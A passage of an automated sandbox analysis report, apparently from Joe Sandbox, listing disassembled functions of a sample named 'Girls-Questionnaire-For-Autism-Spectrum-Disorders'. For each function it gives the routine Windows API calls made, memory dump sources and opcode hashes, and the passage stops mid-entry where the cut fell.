                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2018770650-0
                                                                                              • Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                                              • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                                                              • Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                                              • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryErrorLastRemove
                                                                                              • String ID:
                                                                                              • API String ID: 377330604-0
                                                                                              • Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                                              • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                                                              • Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                                              • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042B852
                                                                                              • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLibraryLoadMode
                                                                                              • String ID:
                                                                                              • API String ID: 2987862817-0
                                                                                              • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                                              • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                                                              • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                                              • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 530164218-0
                                                                                              • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                                              • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                                                              • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                                              • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                                              • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                                              • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                                              • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                                                              • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                                              • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                                              • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                                              • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                                                              • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                                              • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                                                              • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyLong
                                                                                              • String ID:
                                                                                              • API String ID: 2871862000-0
                                                                                              • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                                              • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                                                              • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                                              • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                                                              • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                                              • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                                                              • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                                              • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                                              • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                                                              • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                                              • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                                              • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                                                              • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                                              • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                                              • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                                                              • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                                              • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
